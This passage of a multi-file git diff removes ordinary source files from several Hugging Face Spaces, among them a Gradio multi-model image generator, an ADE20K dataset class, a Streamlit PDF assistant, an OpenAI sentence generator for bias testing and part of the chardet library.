gr.Interface.load(f"models/{models[353]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[354]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[355]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[356]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[357]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[358]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[359]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[360]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[361]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[362]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[363]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[364]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[365]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[366]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[367]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[368]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[369]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[370]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[371]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[372]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[373]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[374]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[375]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[376]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[377]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[378]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[379]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[380]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[381]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[382]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[383]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[384]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[385]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[386]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[387]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[388]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[389]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[390]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[391]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[392]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[393]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[394]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[395]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[396]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[397]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[398]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[399]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[400]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[401]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[402]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[403]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[404]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[405]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[406]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[407]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[408]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[409]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[410]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[411]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[412]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[413]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[414]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[415]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[416]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[417]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[418]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[419]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[420]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[421]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[422]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[423]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[424]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[425]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[426]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[427]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[428]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[429]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[430]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[431]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[432]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[433]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[434]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[435]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[436]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[437]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[438]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[439]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[440]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[441]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[442]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[443]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[444]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[445]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[446]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[447]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[448]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[449]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[450]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[451]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[452]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[453]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[454]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[455]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[456]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[457]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[458]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[459]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[460]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[461]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[462]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[463]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[464]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[465]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[466]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[467]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[469]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[470]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[471]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[472]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[473]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[474]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[475]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[476]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[477]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[478]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[479]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[480]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[481]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[482]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[483]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[484]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[485]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[486]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[487]}",live=True,preprocess=False), -] - - -def text_it1(inputs,text_gen1=text_gen1): - go_t1=text_gen1(inputs) - return(go_t1) - -def set_model(current_model): - current_model = models[current_model] - return gr.update(label=(f"{current_model}")) - - -def send_it1(inputs, model_choice): #negative_prompt, - proc1=models2[model_choice] - output1=proc1(inputs) - #negative_prompt=negative_prompt - return(output1) -css="""""" - - -with gr.Blocks(css=css) as myface: - gr.HTML(""" -
- Toy World
-
- Fast Diffusion - 480 Stable Diffusion models, but why? For your enjoyment!
-
- Once a model is loaded, each new image takes 20 seconds to generate!
-
- If you get an ERROR, that model ran out of memory; try again, or wait a minute and try again. Have fun!
      - """) - with gr.Row(): - with gr.Column(scale=100): - #Model selection dropdown - model_name1 = gr.Dropdown(label="Select Model", choices=[m for m in models], type="index", value=current_model, interactive=True) - with gr.Row(): - with gr.Column(scale=100): - magic1=gr.Textbox(label="Your Prompt", lines=4) #Positive - #with gr.Column(scale=100): - #negative_prompt=gr.Textbox(label="Negative Prompt", lines=1) - gr.HTML("""""") - run=gr.Button("Generate Image") - with gr.Row(): - with gr.Column(style="width=800px"): - output1=gr.Image(label=(f"{current_model}")) - - - with gr.Row(): - with gr.Column(scale=50): - input_text=gr.Textbox(label="Use this box to extend an idea automagically, by typing some words and clicking Extend Idea",lines=2) - see_prompts=gr.Button("Extend Idea -> overwrite the contents of the `Your Prompt´ box above") - use_short=gr.Button("Copy the contents of this box to the `Your Prompt´ box above") - def short_prompt(inputs): - return(inputs) - - model_name1.change(set_model,inputs=model_name1,outputs=[output1]) - - run.click(send_it1, inputs=[magic1, model_name1], outputs=[output1]) - - use_short.click(short_prompt,inputs=[input_text],outputs=magic1) - - see_prompts.click(text_it1,inputs=[input_text],outputs=magic1) - -myface.queue(concurrency_count=200) -myface.launch(inline=True, show_api=False, max_threads=400) \ No newline at end of file diff --git a/spaces/Pengyey/bingo-chuchu/src/components/ui/voice/index.tsx b/spaces/Pengyey/bingo-chuchu/src/components/ui/voice/index.tsx deleted file mode 100644 index 4adcb632226bfced8b97092782811edf08b56569..0000000000000000000000000000000000000000 --- a/spaces/Pengyey/bingo-chuchu/src/components/ui/voice/index.tsx +++ /dev/null @@ -1,28 +0,0 @@ -import './index.scss' - -export interface VoiceProps extends CSSPropertyRule { - num?: number; - duration?: number; -} -export default function Voice({ duration = 400, num = 7, ...others }) { - return ( -
      - {Array.from({ length: num }).map((_, index) => { - const randomDuration = Math.random() * 100 + duration - const initialDelay = Math.random() * 2 * duration - const initialScale = Math.sin((index + 1) * Math.PI / num) - return ( -
      - ) - })} -
      - ) -} diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmseg/datasets/ade.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmseg/datasets/ade.py deleted file mode 100644 index 5913e43775ed4920b6934c855eb5a37c54218ebf..0000000000000000000000000000000000000000 --- a/spaces/Pie31415/control-animation/annotator/uniformer/mmseg/datasets/ade.py +++ /dev/null @@ -1,84 +0,0 @@ -from .builder import DATASETS -from .custom import CustomDataset - - -@DATASETS.register_module() -class ADE20KDataset(CustomDataset): - """ADE20K dataset. - - In segmentation map annotation for ADE20K, 0 stands for background, which - is not included in 150 categories. ``reduce_zero_label`` is fixed to True. - The ``img_suffix`` is fixed to '.jpg' and ``seg_map_suffix`` is fixed to - '.png'. - """ - CLASSES = ( - 'wall', 'building', 'sky', 'floor', 'tree', 'ceiling', 'road', 'bed ', - 'windowpane', 'grass', 'cabinet', 'sidewalk', 'person', 'earth', - 'door', 'table', 'mountain', 'plant', 'curtain', 'chair', 'car', - 'water', 'painting', 'sofa', 'shelf', 'house', 'sea', 'mirror', 'rug', - 'field', 'armchair', 'seat', 'fence', 'desk', 'rock', 'wardrobe', - 'lamp', 'bathtub', 'railing', 'cushion', 'base', 'box', 'column', - 'signboard', 'chest of drawers', 'counter', 'sand', 'sink', - 'skyscraper', 'fireplace', 'refrigerator', 'grandstand', 'path', - 'stairs', 'runway', 'case', 'pool table', 'pillow', 'screen door', - 'stairway', 'river', 'bridge', 'bookcase', 'blind', 'coffee table', - 'toilet', 'flower', 'book', 'hill', 'bench', 'countertop', 'stove', - 'palm', 'kitchen island', 'computer', 'swivel chair', 'boat', 'bar', - 'arcade machine', 'hovel', 'bus', 'towel', 'light', 'truck', 'tower', - 'chandelier', 'awning', 'streetlight', 'booth', 'television receiver', - 'airplane', 'dirt track', 'apparel', 'pole', 'land', 'bannister', - 'escalator', 'ottoman', 'bottle', 'buffet', 'poster', 'stage', 'van', - 'ship', 'fountain', 'conveyer belt', 'canopy', 'washer', 'plaything', - 'swimming pool', 'stool', 'barrel', 'basket', 'waterfall', 'tent', - 'bag', 'minibike', 'cradle', 'oven', 'ball', 'food', 'step', 'tank', - 'trade name', 'microwave', 'pot', 'animal', 'bicycle', 'lake', - 'dishwasher', 'screen', 'blanket', 'sculpture', 'hood', 'sconce', - 'vase', 'traffic light', 'tray', 'ashcan', 'fan', 'pier', 'crt screen', - 'plate', 'monitor', 'bulletin board', 'shower', 'radiator', 'glass', - 'clock', 'flag') - - PALETTE = [[120, 120, 120], [180, 120, 120], [6, 230, 230], [80, 50, 50], - [4, 200, 3], [120, 120, 80], [140, 140, 140], [204, 5, 255], - [230, 230, 230], [4, 250, 7], [224, 5, 255], [235, 255, 7], - [150, 5, 61], [120, 120, 70], [8, 255, 51], [255, 6, 82], - [143, 255, 140], [204, 255, 4], [255, 51, 7], [204, 70, 3], - [0, 102, 200], [61, 230, 250], [255, 6, 51], [11, 102, 255], - [255, 7, 71], [255, 9, 224], [9, 7, 230], [220, 220, 220], - [255, 9, 92], [112, 9, 255], [8, 255, 214], [7, 255, 224], - [255, 184, 6], [10, 255, 71], [255, 41, 10], [7, 255, 255], - [224, 255, 8], [102, 8, 255], [255, 61, 6], [255, 194, 7], - [255, 122, 8], [0, 255, 20], [255, 8, 41], [255, 5, 153], - [6, 51, 255], [235, 12, 255], [160, 150, 20], [0, 163, 255], - [140, 140, 140], [250, 10, 15], [20, 255, 0], [31, 255, 0], - [255, 31, 0], [255, 224, 0], [153, 255, 0], [0, 0, 255], - [255, 71, 0], [0, 235, 255], [0, 173, 255], [31, 0, 255], - [11, 200, 200], [255, 82, 0], [0, 255, 245], [0, 61, 255], - [0, 255, 112], [0, 255, 133], [255, 0, 0], [255, 163, 0], - [255, 102, 0], [194, 255, 0], [0, 143, 255], [51, 
255, 0], - [0, 82, 255], [0, 255, 41], [0, 255, 173], [10, 0, 255], - [173, 255, 0], [0, 255, 153], [255, 92, 0], [255, 0, 255], - [255, 0, 245], [255, 0, 102], [255, 173, 0], [255, 0, 20], - [255, 184, 184], [0, 31, 255], [0, 255, 61], [0, 71, 255], - [255, 0, 204], [0, 255, 194], [0, 255, 82], [0, 10, 255], - [0, 112, 255], [51, 0, 255], [0, 194, 255], [0, 122, 255], - [0, 255, 163], [255, 153, 0], [0, 255, 10], [255, 112, 0], - [143, 255, 0], [82, 0, 255], [163, 255, 0], [255, 235, 0], - [8, 184, 170], [133, 0, 255], [0, 255, 92], [184, 0, 255], - [255, 0, 31], [0, 184, 255], [0, 214, 255], [255, 0, 112], - [92, 255, 0], [0, 224, 255], [112, 224, 255], [70, 184, 160], - [163, 0, 255], [153, 0, 255], [71, 255, 0], [255, 0, 163], - [255, 204, 0], [255, 0, 143], [0, 255, 235], [133, 255, 0], - [255, 0, 235], [245, 0, 255], [255, 0, 122], [255, 245, 0], - [10, 190, 212], [214, 255, 0], [0, 204, 255], [20, 0, 255], - [255, 255, 0], [0, 153, 255], [0, 41, 255], [0, 255, 204], - [41, 0, 255], [41, 255, 0], [173, 0, 255], [0, 245, 255], - [71, 0, 255], [122, 0, 255], [0, 255, 184], [0, 92, 255], - [184, 255, 0], [0, 133, 255], [255, 214, 0], [25, 194, 194], - [102, 255, 0], [92, 0, 255]] - - def __init__(self, **kwargs): - super(ADE20KDataset, self).__init__( - img_suffix='.jpg', - seg_map_suffix='.png', - reduce_zero_label=True, - **kwargs) diff --git a/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/Home.py b/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/Home.py deleted file mode 100644 index e7471fc85212f1d8502ce25bb5894c3c880de1be..0000000000000000000000000000000000000000 --- a/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/Home.py +++ /dev/null @@ -1,139 +0,0 @@ -import streamlit as st -from components.sidebar.OpenAI_API import openai_api_insert_component -from components.body.file_uploader import file_uploader -from components.body.prompt import prompt_box -from components.body import langchain_PDF -from components.sidebar.Auth import authentication_comp, db -import pandas as pd -import os - - -st.set_page_config(page_title="PDF Assistant", page_icon="📖", layout="wide", initial_sidebar_state='expanded') - -if 'logged_in' not in st.session_state: - st.session_state['logged_in'] = False - -if 'username' not in st.session_state: - st.session_state['username'] = None - -if 'login_btn_clicked' not in st.session_state: - st.session_state['login_btn_clicked'] = None - -if 'uuid' not in st.session_state: - st.session_state['uuid'] = None - -if 'login_failed' not in st.session_state: - st.session_state['login_failed'] = None - -if 'response' not in st.session_state: - st.session_state['response'] = None - - -def main(): - st.header(":red[PDF Assistant]: AI-Powered Q&A for _PDFs_") - - if st.session_state['logged_in'] != False and st.session_state['username'] is not None: - st.sidebar.write(f"Welcome **:green[{st.session_state['username']}]** 👋") - - # st.write(os.getenv("FIREBASE_API")) - openai_api_insert_component() # Insert OpenAI API component in sidebar - - # if not logged in, show authentication component - if st.session_state['logged_in'] == False: - with st.sidebar: - authentication_comp() - - - # if logged in, show logout button - if st.session_state['logged_in'] == True: - with st.sidebar: - logout = st.button("Logout 🔒") - if logout: - st.session_state['logged_in'] = False - st.session_state['login_btn_clicked'] = None - st.session_state['username'] = None - st.session_state['uuid'] = None - st.session_state['signup_btn_clicked'] = None - st.button("dummy", 
on_click=st.experimental_rerun()) # dummy button to rerun the app. This is a hacky way to rerun the app. dummy btn is not shown to user. - - - file_uploader_col, prompt_col = st.columns([0.5, 1]) - with file_uploader_col: - file_uploader() - with prompt_col: - prompt_box() - - - generate_answer_button = st.button("Generate Answer") - if generate_answer_button: - - st.session_state['generate_answer_button'] = True - - # check if all are empty - if st.session_state['OPENAI_API_KEY'] == "" and st.session_state['uploaded_file'] is None and st.session_state['prompt'] == "": - st.error("Please set your OpenAI API key in the sidebar, upload a PDF and enter a prompt") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if API key is empty - elif st.session_state['OPENAI_API_KEY'] == "" or st.session_state['OPENAI_API_KEY'] is None: - st.sidebar.error("Please set your OpenAI API key in the sidebar.") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if file is not uploaded and prompt is empty - elif st.session_state['uploaded_file'] is None and st.session_state['prompt'] == "": - st.error("Please upload a PDF and enter a prompt") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if file is not uploaded - elif st.session_state['uploaded_file'] is None: - st.error("Please upload a PDF") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if prompt is empty - elif st.session_state['prompt'] == "": - st.error("Please enter a prompt") - st.session_state['cancel_btn_active'] = True - # st.stop() - - else: # if everything is fine - os.environ['OPENAI_API_KEY'] = st.session_state['OPENAI_API_KEY'] - st.caption(f"Filename: :red[{st.session_state['uploaded_file'].name}]") - response = langchain_PDF.get_response_from_OpenAI_LangChain(st.session_state['uploaded_file'], st.session_state['prompt']) - # st.session_state['response'] = response - st.warning('⚠️ Please note that the response is dependent on the :red[Quality of the PDF] and the :red[Quality of the prompt] and it may not be accurate at times. 
Please use the response as a reference and not as a final answer.') - - - if st.session_state['response'] is not None: - st.write("") - st.write("###### :blue[🤖 **AI Response**]") - st.write(f"#### :green[{st.session_state['response']}]") - st.markdown("------------") - - if st.session_state['logged_in'] == True and st.session_state['username'] is not None: - show_history = st.checkbox("Show History") - - if show_history: - st.write("Your previous interactions are as follows:") - past_docs = db.child("users").child(st.session_state['uuid']).child('pdf_files').get().val() - if past_docs: - selected_doc = st.selectbox("Select a PDF file", options=list(past_docs.keys())) - df = pd.DataFrame.from_dict(past_docs[selected_doc]['Prompts'], orient='index', columns=['prompt', 'response']) - hide_table_row_index = """ - - """ - st.markdown(hide_table_row_index, unsafe_allow_html=True) - st.table(df) - - else: - st.write("##### 😔 :red[No history found.]") - -if __name__ == "__main__": - main() - \ No newline at end of file diff --git a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/grids/compression/debug.py b/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/grids/compression/debug.py deleted file mode 100644 index 5612ff5688d85fede0e605b244919e8081cb1da9..0000000000000000000000000000000000000000 --- a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/grids/compression/debug.py +++ /dev/null @@ -1,31 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Grid search file, simply list all the exp you want in `explorer`. -Any new exp added there will be scheduled. -You can cancel and experiment by commenting its line. - -This grid is a minimal example for debugging compression task -and how to override parameters directly in a grid. 
-Learn more about dora grids: https://github.com/facebookresearch/dora -""" - -from ._explorers import CompressionExplorer -from ...environment import AudioCraftEnvironment - - -@CompressionExplorer -def explorer(launcher): - partitions = AudioCraftEnvironment.get_slurm_partitions(['team', 'global']) - launcher.slurm_(gpus=2, partition=partitions) - launcher.bind_(solver='compression/debug') - - with launcher.job_array(): - # base debug task using config from solver=compression/debug - launcher() - # we can override parameters in the grid to launch additional xps - launcher({'rvq.bins': 2048, 'rvq.n_q': 4}) diff --git a/spaces/RKocielnik/bias-test-gpt/openAI_manager.py b/spaces/RKocielnik/bias-test-gpt/openAI_manager.py deleted file mode 100644 index 3a0ec90a59697846abae3b53339d087e432ede8d..0000000000000000000000000000000000000000 --- a/spaces/RKocielnik/bias-test-gpt/openAI_manager.py +++ /dev/null @@ -1,89 +0,0 @@ -import openai -import backoff -import json -import re - -def initOpenAI(key): - openai.api_key = key - - # list models - models = openai.Model.list() - - return models - -# construct prompts from example_shots -def examples_to_prompt(example_shots, kwd_pair): - prompt = "" - for shot in example_shots: - prompt += "Keywords: "+', '.join(shot['Keywords'])+" ## Sentence: "+ \ - shot['Sentence']+" ##\n" - prompt += f"Keywords: {kwd_pair[0]}, {kwd_pair[1]} ## Sentence: " - return prompt - -def genChatGPT(model_name, kwd_pair, num2gen, numTries, example_shots, temperature=0.8): - # construct prompt - instruction = f"Write a sentence including terms \"{kwd_pair[0]}\" and \"{kwd_pair[1]}\"."# Use examples as guide for the type of sentences to write." - #prompt = examples_to_prompt(example_shots, kwd_pair) - #print(f"Prompt: {prompt}") - #print(f"Instruction: {instruction}") - - # https://github.com/openai/openai-cookbook/blob/main/examples/How_to_handle_rate_limits.ipynb - @backoff.on_exception(backoff.expo, (openai.error.RateLimitError, - openai.error.APIError, - ConnectionResetError, - json.decoder.JSONDecodeError))#, - #max_time=300, - #raise_on_giveup=False, - #giveup=fatal_code) - - def completions_with_backoff(**kwargs): - return openai.ChatCompletion.create(**kwargs) - - resp = [] - tries = 0 - while len(resp) < num2gen and tries < numTries: - # Prompt OpenAI - # https://platform.openai.com/docs/api-reference/chat/create - response = completions_with_backoff(model=model_name, - temperature=temperature, - messages=[{"role": "system", "content": instruction}]) - # ,{"role": "user", "content": prompt} - - sentence = response["choices"][0]["message"]["content"] - - fnd_kwd_0 = list(re.finditer(f'{kwd_pair[0].lower()}[ .,!]+', sentence.lower())) - fnd_kwd_1 = list(re.finditer(f'{kwd_pair[1].lower()}[ .,!]+', sentence.lower())) - if len(fnd_kwd_0)>0 and len(fnd_kwd_1)>0: - resp.append([kwd_pair[0], kwd_pair[1], sentence]) - - tries += 1 - - return resp - -# generate sentences -def generateTestSentences(model_name, group_kwds, attribute_kwds, progress): - fixed_shots = [ - {"Keywords": ["dog", "frisbee", "catch", "throw"], "Sentence": "A dog leaps to catch a thrown frisbee"}, - {"Keywords": ["apple", "bag", "puts"], "Sentence": "A girl puts an apple in her bag"}, - {"Keywords": ["apple", "tree", "pick"], "Sentence": "A man picks some apples from a tree"}, - {"Keywords": ["apple", "basket", "wash"], "Sentence": "A boy takes an apple from a basket and washes it"}, - {"Keywords": ["white old man", "ceo"], "Sentence": "A white old man was a ceo of a big international company"} - ] - - 
print(f"Groups: [{group_kwds}]\nAttributes: [{attribute_kwds}]") - - numTries = 5 - num2gen = 2 - all_gens = [] - num_steps = len(group_kwds)*len(attribute_kwds) - for gi, grp_kwd in enumerate(group_kwds): - for ai, att_kwd in enumerate(attribute_kwds): - progress((gi*len(attribute_kwds)+ai)/num_steps, desc=f"Generating {grp_kwd}<>{att_kwd}...") - - kwd_pair = [grp_kwd.strip(), att_kwd.strip()] - - gens = genChatGPT(model_name, kwd_pair, num2gen, numTries, fixed_shots, temperature=0.8) - #print(f"Gens for pair: <{kwd_pair}> -> {gens}") - all_gens.extend(gens) - - return all_gens diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/chardet/universaldetector.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/chardet/universaldetector.py deleted file mode 100644 index 22fcf8290c1026d3ae35c6ae605a67b3f24c85e7..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/chardet/universaldetector.py +++ /dev/null @@ -1,328 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### -""" -Module containing the UniversalDetector detector class, which is the primary -class a user of ``chardet`` should use. - -:author: Mark Pilgrim (initial port to Python) -:author: Shy Shalom (original C code) -:author: Dan Blanchard (major refactoring for 3.0) -:author: Ian Cordasco -""" - - -import codecs -import logging -import re - -from .charsetgroupprober import CharSetGroupProber -from .enums import InputState, LanguageFilter, ProbingState -from .escprober import EscCharSetProber -from .latin1prober import Latin1Prober -from .mbcsgroupprober import MBCSGroupProber -from .sbcsgroupprober import SBCSGroupProber -from .utf1632prober import UTF1632Prober - - -class UniversalDetector: - """ - The ``UniversalDetector`` class underlies the ``chardet.detect`` function - and coordinates all of the different charset probers. - - To get a ``dict`` containing an encoding and its confidence, you can simply - run: - - .. 
code:: - - u = UniversalDetector() - u.feed(some_bytes) - u.close() - detected = u.result - - """ - - MINIMUM_THRESHOLD = 0.20 - HIGH_BYTE_DETECTOR = re.compile(b"[\x80-\xFF]") - ESC_DETECTOR = re.compile(b"(\033|~{)") - WIN_BYTE_DETECTOR = re.compile(b"[\x80-\x9F]") - ISO_WIN_MAP = { - "iso-8859-1": "Windows-1252", - "iso-8859-2": "Windows-1250", - "iso-8859-5": "Windows-1251", - "iso-8859-6": "Windows-1256", - "iso-8859-7": "Windows-1253", - "iso-8859-8": "Windows-1255", - "iso-8859-9": "Windows-1254", - "iso-8859-13": "Windows-1257", - } - - def __init__(self, lang_filter=LanguageFilter.ALL): - self._esc_charset_prober = None - self._utf1632_prober = None - self._charset_probers = [] - self.result = None - self.done = None - self._got_data = None - self._input_state = None - self._last_char = None - self.lang_filter = lang_filter - self.logger = logging.getLogger(__name__) - self._has_win_bytes = None - self.reset() - - @property - def input_state(self): - return self._input_state - - @property - def has_win_bytes(self): - return self._has_win_bytes - - @property - def charset_probers(self): - return self._charset_probers - - def reset(self): - """ - Reset the UniversalDetector and all of its probers back to their - initial states. This is called by ``__init__``, so you only need to - call this directly in between analyses of different documents. - """ - self.result = {"encoding": None, "confidence": 0.0, "language": None} - self.done = False - self._got_data = False - self._has_win_bytes = False - self._input_state = InputState.PURE_ASCII - self._last_char = b"" - if self._esc_charset_prober: - self._esc_charset_prober.reset() - if self._utf1632_prober: - self._utf1632_prober.reset() - for prober in self._charset_probers: - prober.reset() - - def feed(self, byte_str): - """ - Takes a chunk of a document and feeds it through all of the relevant - charset probers. - - After calling ``feed``, you can check the value of the ``done`` - attribute to see if you need to continue feeding the - ``UniversalDetector`` more data, or if it has made a prediction - (in the ``result`` attribute). - - .. note:: - You should always call ``close`` when you're done feeding in your - document if ``done`` is not already ``True``. 
